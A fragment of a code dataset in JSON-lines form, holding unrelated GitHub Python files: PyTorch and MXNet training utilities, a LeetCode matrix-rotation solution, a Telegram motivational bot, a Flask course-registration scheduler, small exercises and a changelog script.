axis=1).\ndef reverse_sequences(mini_batch, seq_lengths):\n reversed_mini_batch = torch.zeros_like(mini_batch)\n for b in range(mini_batch.size(0)):\n T = seq_lengths[b]\n time_slice = torch.arange(T - 1, -1, -1, device=mini_batch.device)\n reversed_sequence = torch.index_select(mini_batch[b, :, :], 0, time_slice)\n reversed_mini_batch[b, 0:T, :] = reversed_sequence\n return reversed_mini_batch\n\ndef get_mini_batch_mask(mini_batch, seq_lengths):\n mask = torch.zeros(mini_batch.shape[0:2])\n for b in range(mini_batch.shape[0]):\n mask[b, 0:seq_lengths[b]] = torch.ones(seq_lengths[b])\n return mask\n\ndef batchify(sequences, seq_lengths, sequences_feature_mask, static, y_sequence, y_mask_sequence, max_len=720, batch_size=128, use_feature_mask=True, cuda=True):\n\n keep_index = np.where(np.logical_and(seq_lengths <= max_len, seq_lengths > 0))[0]\n\n static = static[keep_index]\n sequences = sequences[keep_index]\n seq_lengths = seq_lengths[keep_index]\n if sequences_feature_mask is not None:\n sequences_feature_mask = sequences_feature_mask[keep_index]\n if y_sequence is not None:\n y_sequence = y_sequence[keep_index]\n if y_mask_sequence is not None:\n y_mask_sequence = y_mask_sequence[keep_index]\n\n\n N_data = len(seq_lengths)\n N_mini_batches = int(N_data / batch_size +\n int(N_data % batch_size > 0))\n\n shuffled_indices = np.arange(N_data)\n\n batches = []\n\n for which_mini_batch in range(N_mini_batches):\n mini_batch_start = (which_mini_batch * batch_size)\n mini_batch_end = np.min([(which_mini_batch + 1) * batch_size, N_data])\n mini_batch_indices = shuffled_indices[mini_batch_start:mini_batch_end]\n \n batches.append(get_mini_batch(mini_batch_indices, sequences, seq_lengths, sequences_feature_mask, static, y_sequence, y_mask_sequence, keep_index, use_feature_mask=use_feature_mask, cuda=cuda))\n\n return batches\n\ndef get_mini_batch(mini_batch_indices, sequences, seq_lengths, sequences_feature_mask=None, static=None, y_sequence=None, y_mask_sequence=None, indices_dataset=None, use_feature_mask=False, cuda=False):\n '''\n IMPORTANT NOTE: Currently, we are merging mini_batch_reversed and mini_batch_feature_mask_reversed \n if sequences_feature_mask exists!\n '''\n # get the sequence lengths of the mini-batch\n #sorted_seq_lengths and sorted_mini_batch_indices\n seq_lengths = seq_lengths[mini_batch_indices]\n seq_lengths = torch.from_numpy(seq_lengths).type('torch.LongTensor')\n\n # sort the sequence lengths\n _, sorted_seq_length_indices = torch.sort(seq_lengths)\n sorted_seq_length_indices = sorted_seq_length_indices.flip(0)\n sorted_seq_lengths = seq_lengths[sorted_seq_length_indices]\n sorted_mini_batch_indices = mini_batch_indices[sorted_seq_length_indices.numpy()]\n\n # compute the length of the longest sequence in the mini-batch\n T_max = torch.max(seq_lengths)\n # this is the sorted mini-batch\n mini_batch = list(map(lambda x: torch.from_numpy(x[:T_max,:]).type('torch.DoubleTensor') , sequences[sorted_mini_batch_indices]))\n mini_batch = pad_sequence(mini_batch, batch_first=True).type('torch.DoubleTensor')\n #This is the sorted mini_batch_static\n mini_batch_static = static[sorted_mini_batch_indices]\n mini_batch_static = torch.from_numpy(mini_batch_static).type('torch.DoubleTensor')\n\n # get mask for mini-batch\n mini_batch_mask = get_mini_batch_mask(mini_batch, sorted_seq_lengths)\n #get the y values (mortality labels) of mini-batch\n if y_sequence is None:\n y_mini_batch = None\n else:\n y_mini_batch = y_sequence[sorted_mini_batch_indices]\n y_mini_batch = 
torch.from_numpy(y_mini_batch).type('torch.DoubleTensor')\n\n #get y mask values (for semi-supervised learning)\n if y_mask_sequence is None:\n y_mask_mini_batch = None\n else:\n y_mask_mini_batch = y_mask_sequence[sorted_mini_batch_indices]\n y_mask_mini_batch = torch.from_numpy(y_mask_mini_batch).type('torch.DoubleTensor')\n\n # Feature_mask not used for ELBO as masking or guide\n if sequences_feature_mask is None: \n mini_batch_feature_mask = None\n mini_batch_reversed_with_mask = reverse_sequences(mini_batch, sorted_seq_lengths)\n # Feature mask only used for ELBO as masking\n elif sequences_feature_mask is not None and not use_feature_mask:\n #This is the sorted mini_batch_feature_mask\n mini_batch_feature_mask = list(map(lambda x: torch.from_numpy(x[:T_max,:]).type('torch.DoubleTensor') , sequences_feature_mask[sorted_mini_batch_indices]))\n mini_batch_feature_mask = pad_sequence(mini_batch_feature_mask, batch_first=True).type('torch.DoubleTensor')\n \n mini_batch_reversed_with_mask = reverse_sequences(mini_batch, sorted_seq_lengths)\n #Feature mask will be used for both ELBO and guide \n else:\n #This is the sorted mini_batch_feature_mask\n mini_batch_feature_mask = list(map(lambda x: torch.from_numpy(x[:T_max,:]).type('torch.DoubleTensor') , sequences_feature_mask[sorted_mini_batch_indices]))\n mini_batch_feature_mask = pad_sequence(mini_batch_feature_mask, batch_first=True).type('torch.DoubleTensor')\n # this is the sorted mini-mini_batch_feature_mask in reverse temporal order\n mini_batch_reversed_with_mask = reverse_sequences(torch.cat((mini_batch, mini_batch_feature_mask),dim=-1), sorted_seq_lengths)\n\n # cuda() here because need to cuda() before packing\n if cuda:\n mini_batch = mini_batch.cuda()\n mini_batch_static = mini_batch_static.cuda()\n mini_batch_mask = mini_batch_mask.cuda()\n if y_mini_batch is not None:\n y_mini_batch = y_mini_batch.cuda()\n if y_mask_mini_batch is not None:\n y_mask_mini_batch = y_mask_mini_batch.cuda()\n mini_batch_reversed_with_mask = mini_batch_reversed_with_mask.cuda()\n if mini_batch_feature_mask is not None:\n mini_batch_feature_mask = mini_batch_feature_mask.cuda()\n \n # do sequence packing\n mini_batch_reversed_with_mask = nn.utils.rnn.pack_padded_sequence(mini_batch_reversed_with_mask,\n sorted_seq_lengths,\n batch_first=True)\n\n return mini_batch_static, mini_batch, mini_batch_reversed_with_mask, mini_batch_mask, sorted_seq_lengths, mini_batch_feature_mask, y_mini_batch, y_mask_mini_batch, indices_dataset[sorted_mini_batch_indices]\n\n\n\ndef pad_and_reverse(rnn_output, seq_lengths):\n rnn_output, _ = nn.utils.rnn.pad_packed_sequence(rnn_output, batch_first=True)\n reversed_output = reverse_sequences(rnn_output, seq_lengths)\n return reversed_output","repo_name":"oezyurty/AttDMM","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":17808,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38393405110","text":"# You are given an n x n 2D matrix representing an image, rotate the image by 90 degrees (clockwise).\n# You have to rotate the image in-place, \n# which means you have to modify the input 2D matrix directly. 
DO NOT allocate another 2D matrix and do the rotation.\n\n# tips:\n# 走訪矩陣左上半部的元素,然後順時鐘交換四個角的元素位置\n# 或轉置+水平翻轉,水平翻轉+轉置會變成矩陣逆時鐘轉90度\n# 或垂直翻轉+轉置\n\n\n# blind spot:\n# 走訪矩陣左上半部的元素需要考慮奇數情況,用n%2\n# 轉置需要只走嚴格上三角矩陣,for j in range(i+1, n)\n\n# first try: 交換四個角的位置\nclass Solution(object):\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix[0])\n \n # 走訪矩陣位於左上角的元素\n for i in range(n//2 + n % 2): # + n % 2是為了在長度為奇數的矩陣,走訪行或列在中間的元素\n for j in range(n//2):\n # 四個角順時鐘交換位置\n temp = matrix[i][j] # 存左上角\n matrix[i][j] = matrix[n-1-j][i] # 左下覆蓋左上\n matrix[n-1-j][i] = matrix[n-1-i][n-1-j] # 右下覆蓋左下\n matrix[n-1-i][n-1-j] = matrix[j][n-1-i] # 右上覆蓋右下\n matrix[j][n-1-i] = temp # 左上覆蓋右上\n\n# first try: 轉置+水平翻轉\nclass Solution(object):\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n # self.transpose(matrix)\n # self.horizontal_reflect(matrix)\n\n self.vertical_reflect(matrix)\n self.transpose(matrix)\n \n def transpose(self, matrix):\n n = len(matrix)\n # range(i+1, n)只走訪嚴格上三角矩陣(不含對角線)的元素\n for i in range(n):\n for j in range(i+1, n):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n \n def horizontal_reflect(self, matrix):\n n = len(matrix)\n # range(n // 2)只走訪左半邊的元素\n for i in range(n):\n for j in range(n // 2):\n matrix[i][j], matrix[i][n-1-j] = matrix[i][n-1-j], matrix[i][j]\n\n def vertical_reflect(self, matrix):\n n = len(matrix)\n for i in range(n // 2):\n for j in range(n):\n matrix[i][j], matrix[n-1-i][j] = matrix[n-1-i][j], matrix[i][j]\n ","repo_name":"hcygeorge/my-leetcode","sub_path":"array/medium/48. Rotate Image.py","file_name":"48. Rotate Image.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11675609639","text":"from torch import Tensor as TorchTensor\nfrom torch.utils.data import DataLoader as TorchDataLoader\nfrom torch.utils.data import Dataset as TorchDataset\n\nfrom mf.base.data.dataloader import DataLoader as DataLoaderBase\nfrom mf.ports.torch_port.tensor_impl import TensorImpl as Tensor\n\n\nclass DataLoader(DataLoaderBase):\n\n def __init__(self, dataset, batch_size=1, shuffle: bool = False, num_workers: int = 0, pin_memory: bool = False):\n super().__init__(dataset, batch_size, shuffle, num_workers, pin_memory)\n\n self.__dataloader = TorchDataLoader(DatasetUnwrap(dataset), batch_size=batch_size, shuffle=shuffle,\n num_workers=num_workers, pin_memory=pin_memory)\n\n def __iter__(self):\n return Iterator(self.__dataloader.__iter__())\n\n\nclass DatasetUnwrap(TorchDataset):\n def __init__(self, dataset):\n super().__init__()\n self.dataset = dataset\n\n def __getitem__(self, idx):\n data = self.dataset[idx]\n data = unwrap_tensor(data)\n return data\n\n def __len__(self):\n return len(self.dataset)\n\n\nclass Iterator:\n def __init__(self, raw_iterator):\n self.raw_iterator = raw_iterator\n\n def __next__(self):\n try:\n data = self.raw_iterator.__next__()\n data = wrap_tensor(data)\n return data\n except StopIteration:\n raise StopIteration\n\n\ndef unwrap_tensor(data):\n if isinstance(data, tuple):\n data = tuple([x.__raw_tensor__ for x in data])\n elif isinstance(data, list):\n data = list([x.__raw_tensor__ for x in data])\n elif isinstance(data, Tensor):\n data = data.__raw_tensor__\n else:\n raise NotImplementedError\n return data\n\n\ndef wrap_tensor(data):\n 
if isinstance(data, tuple):\n data = tuple([Tensor(__raw_tensor__=x) for x in data])\n elif isinstance(data, list):\n data = list([Tensor(__raw_tensor__=x) for x in data])\n elif isinstance(data, TorchTensor):\n data = Tensor(__raw_tensor__=data)\n else:\n raise NotImplementedError\n return data\n","repo_name":"elyar-adil/magicflow","sub_path":"mf/ports/torch_port/data/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75058881067","text":"import logging\nimport multiprocessing\n\nlog_level = logging.INFO\nlogger = logging.getLogger(__name__)\nlogger.setLevel(log_level)\nch = logging.StreamHandler()\nch.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nnumber_of_cores = multiprocessing.cpu_count()\nnumber_of_threads = 5\nnum_of_links = 1000\nurl = \"https://edition.cnn.com/\"\n\"\"\"\nI have 8 cores, so I did not describe the behavior when the number of links is divided with the remainder.\nThis problem could be solved by adding the rest of the links to the last thread along with the main chunk.\nPlease keep this in mind.\n\"\"\"\nchunk_size = num_of_links // number_of_cores\n","repo_name":"chugunovyar/gil_demo","sub_path":"configurator.py","file_name":"configurator.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8278236407","text":"from aiogram.types import InputFile\n\nfrom cfg import TOKEN, ADMIN_NAME, ADMIN_ID\nimport random\nfrom aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.utils import executor\nfrom aiogram.dispatcher.filters import Text\nfrom datetime import datetime ######################\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot)\nlistUser = []\ndata = []\nadminName = ADMIN_NAME\nadminId = ADMIN_ID\n\n\n@dp.message_handler(commands=['start'])\nasync def cmd_start(msg: types.Message):\n if msg.chat.username not in listUser:\n listUser.append(msg.chat.username)\n with open(\"users.txt\", \"w\") as file:\n for line in listUser:\n file.write(','+line)\n user = open('users/'+msg.chat.username+'.txt', 'w')\n user.write(str(msg.from_user.id))\n user.close()\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n time_now = datetime.now().strftime('%H:%M') #######\n print(msg.chat.username + \" начал использовать бота в [\" + time_now + \"]\") #######\n time_now = datetime.now().strftime('%H:%M')\n test = open('file.txt', 'a')\n test.write(\"\\n\" + msg.chat.username + \" начал использовать бота в [\" + time_now + \"]\")\n test.close()\n buttons = [\"Замотивируй меня\", \"Помоги\"]\n keyboard.add(*buttons)\n await msg.answer(\n \"Привет, \" + msg.chat.username + '!\\nЯ мотивирующий бот!\\nНапиши \"Замотивируй меня\", и я выдам тебе мотивашку!',\n parse_mode=\"HTML\", reply_markup=keyboard)\n\n\n@dp.message_handler(Text(equals=\"Замотивируй меня\"))\nasync def with_puree(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M') #######\n print(\"[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test = open('logs.txt', 'a') ######\n test.write(\"\\n[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text) ########\n test.close() #############\n user = open('users/' + msg.chat.username + '.txt', 'w')\n 
user.write(str(msg.from_user.id))\n user.close()\n num = str(random.randint(0, 62))\n photo = InputFile(path_or_bytesio='assets/' + num + '.jpg')\n await bot.send_photo(chat_id=msg.chat.id, photo=photo)\n\n\n@dp.message_handler(Text(equals=\"Помоги\"))\nasync def process_help_command(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M') ######\n print(\"[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test = open('logs.txt', 'a') ######\n test.write(\"\\n[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text) ######\n test.close() ##############\n await msg.reply('Напиши \"Замотивируй меня\", и я выдам тебе мотивашку!', parse_mode=\"HTML\")\n\n\n@dp.message_handler(Text(equals=\"Список\")) ##################\nasync def echo_message(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M') ######\n print(\"Пользователь \" + msg.chat.username + \"(\" + str(\n msg.from_user.id) + \") обратился ко мне за списком в [\" + time_now + \"]\")\n if msg.from_user.id == 933846611 and msg.chat.username == adminName:\n await msg.reply(\n 'Приветствую, Г-н Администратор!\\nВот список пользователей, использовавших меня: ' + str(listUser),\n parse_mode=\"HTML\")\n else:\n await msg.reply('Ты не администратор этого бота! Тебе нельзя использовать эту команду!',\n parse_mode=\"HTML\")\n\n@dp.message_handler(commands=\"send\") ##################\nasync def echo_message(msg: types.Message):\n #time_now = datetime.now().strftime('%H:%M') ######\n if msg.from_user.id == 933846611 and msg.chat.username == adminName:\n arg = msg.get_args()\n text = arg.split(\" \")\n string = ''\n userN = text[0]\n #print(text)\n text.pop(0)\n for el in text:\n string += el + ' '\n file = open('users/'+str(userN)+'.txt')\n dataID = file.read()\n file.close()\n #print(dataID)\n await bot.send_message(chat_id=dataID, text = string)\n else:\n await bot.send_message(chat_id=msg.from_user.id, text=\"Ты черт, а не админ!\")\n\n#############\n\n@dp.message_handler() ##################\nasync def echo_message(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M')\n if msg.chat.username not in listUser:\n listUser.append(msg.chat.username)\n print(\"[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test = open('logs.txt', 'a')\n test.write(\"\\n[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test.close()\n\n #############\n\n\n\ndef bot():\n file = open(\"users.txt\", \"r\")\n dataList = file.read()\n listUser = dataList.split(\",\")\n file.close()\n print(listUser)\n executor.start_polling(dp)","repo_name":"Dissmor/Laba-2_OPD","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"720549755","text":"import os, sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\nfrom utils import get_data\nimport mxnet as mx\nimport numpy as np\nimport logging\n\n# whether to demo model-parallelism + data parallelism\ndemo_data_model_parallelism = True\n\nif demo_data_model_parallelism:\n contexts = [[mx.context.gpu(0), mx.context.gpu(1)], [mx.context.gpu(2), mx.context.gpu(3)]]\nelse:\n contexts = [mx.context.cpu(), mx.context.cpu()]\n\n#--------------------------------------------------------------------------------\n# module 1\n#--------------------------------------------------------------------------------\ndata = mx.symbol.Variable('data')\nfc1 = mx.symbol.FullyConnected(data, 
name='fc1', num_hidden=128)\nact1 = mx.symbol.Activation(fc1, name='relu1', act_type=\"relu\")\n\nmod1 = mx.mod.Module(act1, label_names=[], context=contexts[0])\n\n#--------------------------------------------------------------------------------\n# module 2\n#--------------------------------------------------------------------------------\ndata = mx.symbol.Variable('data')\nfc2 = mx.symbol.FullyConnected(data, name = 'fc2', num_hidden = 64)\nact2 = mx.symbol.Activation(fc2, name='relu2', act_type=\"relu\")\nfc3 = mx.symbol.FullyConnected(act2, name='fc3', num_hidden=10)\nsoftmax = mx.symbol.SoftmaxOutput(fc3, name = 'softmax')\n\nmod2 = mx.mod.Module(softmax, context=contexts[1])\n\n#--------------------------------------------------------------------------------\n# Container module\n#--------------------------------------------------------------------------------\nmod_seq = mx.mod.SequentialModule()\nmod_seq.add(mod1).add(mod2, take_labels=True, auto_wiring=True)\n\n\n#--------------------------------------------------------------------------------\n# Training\n#--------------------------------------------------------------------------------\nn_epoch = 2\nbatch_size = 100\nbasedir = os.path.dirname(__file__)\nget_data.get_mnist(os.path.join(basedir, \"data\"))\n\ntrain_dataiter = mx.io.MNISTIter(\n image=os.path.join(basedir, \"data\", \"train-images-idx3-ubyte\"),\n label=os.path.join(basedir, \"data\", \"train-labels-idx1-ubyte\"),\n data_shape=(784,),\n batch_size=batch_size, shuffle=True, flat=True, silent=False, seed=10)\nval_dataiter = mx.io.MNISTIter(\n image=os.path.join(basedir, \"data\", \"t10k-images-idx3-ubyte\"),\n label=os.path.join(basedir, \"data\", \"t10k-labels-idx1-ubyte\"),\n data_shape=(784,),\n batch_size=batch_size, shuffle=True, flat=True, silent=False)\n\nlogging.basicConfig(level=logging.DEBUG)\nmod_seq.fit(train_dataiter, eval_data=val_dataiter,\n optimizer_params={'learning_rate':0.01, 'momentum': 0.9}, num_epoch=n_epoch)\n\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/module/sequential_module.py","file_name":"sequential_module.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"72715693867","text":"import requests\n#import threading\n#import time\nfrom datetime import datetime\nfrom time import sleep\nimport asyncio\nimport threading\nimport json\n\n#import schedule\nimport flask\n\nfrom courses import Semester, Course\nfrom coursedb import CourseDB\nfrom user import User\nfrom utils import url_generator, preprocess_user_input\n\nCOURSE_DATABASE_FILENAME = 'Course_Info.xlsx'\nSCHEDULED_EVENTS_INTERVAL = 1 # seconds per checking scheduled events\nDEFAULT_TIME = datetime(2022, 12, 11, 20, 0, 0)\nDEFAULT_SEMESTER = ('Spring', 2023)\n\nasync def run_at(dt, method):\n await asyncio.sleep((dt - datetime.now()).total_seconds()) # requires python version 3.8 or above\n return await method\n\nasync def register(user : User):\n print('Performing course registration for user {user.id}:')\n user.register() # runs the register() method on the user exactly once \n\napp = flask.Flask(__name__) # initialize the Flask app\ncoursedb = CourseDB(COURSE_DATABASE_FILENAME) # initialize the database\nuser = User(coursedb) # initialize a default user for now\nuser.set_active_semester(*DEFAULT_SEMESTER)\nuser.prep_auth() # capture the user's auth token by having them sign in to the student link\nloop = asyncio.new_event_loop() # initialize an event loop to schedule 
registration at specific times\n\ndef run_app():\n app.run(host='127.0.0.1', port=53303)\n\ndef run_loop():\n loop.run_forever()\n\n@app.route('/', methods=['GET', 'POST'])\ndef default_output():\n print(flask.request.get_json())\n print(flask.request.json)\n response = {'status': 'Flask server online'}\n return flask.jsonify(response)\n\n@app.route('/request', methods=['POST'])\ndef api_request_handler() -> flask.Response: # bind the Flask input to this method\n data = flask.request.json\n schedule_registration(data)\n json_file = {}\n #json_file['query'] = 'response'\n return flask.jsonify(json_file)\n\ndef schedule_registration(data : str):\n print(data)\n scheduled_time = 'now'\n if 'time' not in data:\n time_raw = 'NOW'\n else:\n time_raw = data['time']\n courses = json.loads(data['classList'])\n plan = 'plan' in data\n if time_raw != 'NOW':\n try:\n scheduled_time = datetime.strptime(time_raw, r'%d/%m/%Y %I:%M %p') # dd/mm/yyyy hh:mm [AM/PM]\n except:\n print(f\"Warning: defaulting to time {DEFAULT_TIME}\")\n scheduled_time = DEFAULT_TIME # default time to avoid errors\n print(f\"Scheduling courses {courses} at {scheduled_time}\")\n for course in courses:\n user.add_course(Course(coursedb, *preprocess_user_input(course[0])))\n if time_raw != 'NOW':\n sleeptime : int = (scheduled_time - datetime.now()).seconds + 86400 * (scheduled_time - datetime.now()).days\n print(f'Waiting {sleeptime} seconds. . .')\n sleep(sleeptime)\n user.register()\n #loop.create_task(run_at(scheduled_time, register(user))) \n\ndef test_scheduler():\n schedule_registration(data = {'classList': '[[\"CAS AA385 A1\"]]', 'time': 'NOW'})\n\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670822671?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670822639?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820688?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820707?SelectIt=0001151409&College=CAS&Dept=AA&Course=385&Section=A1&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2022&KeySem=20223&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820688?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2023&KeySem=20234&PreregViewSem=&PreregKeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n#https://www.bu.edu/link/bin/uiscgi_studentlink.pl/1670820825?SelectIt=0001151409&ModuleName=reg%2Fadd%2Fconfirm_classes.pl&AddPreregInd=&AddPlannerInd=&ViewSem=Spring+2022&KeySem=20223&PreregViewSem=&Prereg
KeySem=&SearchOptionCd=S&SearchOptionDesc=Class+Number&MainCampusInd=&BrowseContinueInd=&ShoppingCartInd=&ShoppingCartList=\n\nif __name__ == '__main__':\n test_scheduler()\n loop_thread = threading.Thread(target=run_loop)\n loop_thread.start()\n print('Asyncio initialization complete')\n app_thread = threading.Thread(target=run_app)\n app_thread.start()\n app_thread.join()\n print('Flask app forcibly stopped; stopping loop')\n loop.stop()\n print('Press CTRL+C to close remaining threads')\n sleep(1)\n exit()\n while True: \n sleep(1) #catch ctrl + c if exit() fails somehow\n \n \n\n\"\"\"\nusers : dict(User) = {}\n@app.route('/adduser')\ndef add_user(username : str):\n users[username] = User(coursedb)\n\"\"\"\n","repo_name":"corndog-overflow/courseRegProject","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39458857621","text":"\"\"\"Stores utilility functions that don't go anywhere else.\n\"\"\"\nimport typing\n\nV = typing.TypeVar(\"V\")\n\n\ndef split_dict(\n input_dict: typing.Mapping[str, V], include: typing.Iterable[str],\n) -> typing.Tuple[typing.Dict[str, V], typing.Dict[str, V]]:\n \"\"\"Splits a dict into two by key\n\n Parameters:\n input_dict: The dict to split\n include: The keys to put into the include dict\n\n Returns:\n `included, excluded`:\n A dict with the included keys, and a dict with the excluded keys\n \"\"\"\n excluded_dict = dict(**input_dict) # so we don't modify original\n included_dict = {\n key: excluded_dict.pop(key) # remove from excluded dict\n for key in include\n if key in excluded_dict\n }\n return included_dict, excluded_dict\n","repo_name":"aloisklink/flirextractor","sub_path":"flirextractor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"1705022345","text":"from random import randint\n\n\ndef eh_par(numero):\n return numero % 2 == 0\n\n\ndef soma_par(lista):\n soma = 0\n\n for num in lista:\n if eh_par(num):\n soma += num\n return soma\n\n\ndef sorteio():\n numeros = list()\n\n print('Sorteando os 5 valores da lista: ', end='')\n for i in range(0, 5):\n aleatorio = randint(1, 100)\n print(f'{aleatorio}', end=' ')\n numeros.append(aleatorio)\n\n soma = soma_par(numeros)\n\n print(' PRONTO!')\n print(f'Somando os valores pares de {numeros}, temos {soma}')\n\n\nsorteio()\n","repo_name":"Akylles/Python---Gustavo-Guanabara","sub_path":"desafios/100.py","file_name":"100.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34184219539","text":"import os\nimport time\n\ndir_path = \"../time/\"\nwhile True:\n current_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n file_name = current_time.replace(\":\", \"_\") + \".txt\"\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, \"w+\") as f:\n f.write(current_time)\n time.sleep(10)\n\n","repo_name":"randomanimedude/TCS","sub_path":"Lab_04/time_checker/clock/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13372620343","text":"\"\"\"\nUpdate changelog.\n\nRequirements:\n\n- python-gitlab\n\nUsage:\n\npython scripts/update-changelog.py 3.5.0 3.5.1\n\n\"\"\"\nimport 
datetime\nimport os\nimport sys\n\nimport gitlab\n\nexcluded_labels = ['duplicate', 'question', 'invalid', 'wontfix', 'rejected', 'technical task', 'news', \"annoucement\", 'not our bug', 'discussion', 'website', 'support']\n\n\ndef find_milestone_id(project):\n global milestone_id\n milestone_id = None\n for milestone in project.milestones.list():\n if milestone.title == milestone_title:\n milestone_id = milestone.id\n break\n\n if milestone_id is None:\n print(\"failed to find requested milestone\")\n sys.exit(1)\n\n return milestone_id\n\n\ndef find_milestone_issues(project):\n issues = []\n for issue in project.issues.list(all=True):\n if issue.milestone is not None and issue.milestone[\"id\"] == milestone_id and issue.state == \"closed\" and not is_excluded(issue):\n issues.append(issue)\n return issues\n\n\ndef is_excluded(issue):\n for label in issue.labels:\n if label in excluded_labels:\n return True\n return False\n\n\ndef find_milestone_merge_requests(project):\n global merge_requests\n merge_requests = []\n for mr in project.mergerequests.list(all=True):\n if mr.milestone is not None and mr.milestone[\"id\"] == milestone_id:\n merge_requests.append(mr)\n return merge_requests\n\n\ndef title(milestone_title):\n now = datetime.datetime.now()\n return f\"## [{milestone_title}](https://gitlab.com/ColinDuquesnoy/MellowPlayer/tree/{milestone_title}) ({now.year}-{now.month}-{now.day})\"\n\n\ndef full_changelog(previous_milestone, new_milestone):\n return f\"[Full Changelog](https://gitlab.com/ColinDuquesnoy/MellowPlayer/compare/{previous_milestone}...{new_milestone})\"\n\n\ndef is_feature(issue):\n for label in issue.labels:\n if \"feature\" in label:\n return True\n return False\n\n\ndef is_bug(issue):\n for label in issue.labels:\n if \"bug\" in label or \"broken\" in label:\n return True\n return False\n\n\ndef implemented_features(issues):\n formatted_issues = [\n \"\"\n \"**Implemented enhancements:**\",\n \"\"\n ]\n for issue in issues:\n if is_feature(issue):\n formatted_issues.append(format_issue(issue))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef fixed_bugs(issues):\n formatted_issues = [\n \"\"\n \"**Fixed bugs:**\",\n \"\"\n ]\n for issue in issues:\n if is_bug(issue):\n formatted_issues.append(format_issue(issue))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef closed_issues(issues):\n formatted_issues = [\n \"\",\n \"**Closed issues:**\",\n \"\"\n ]\n for issue in issues:\n if not is_bug(issue) and not is_feature(issue):\n formatted_issues.append(format_issue(issue))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef merged_merge_requests(merge_requests):\n formatted_issues = 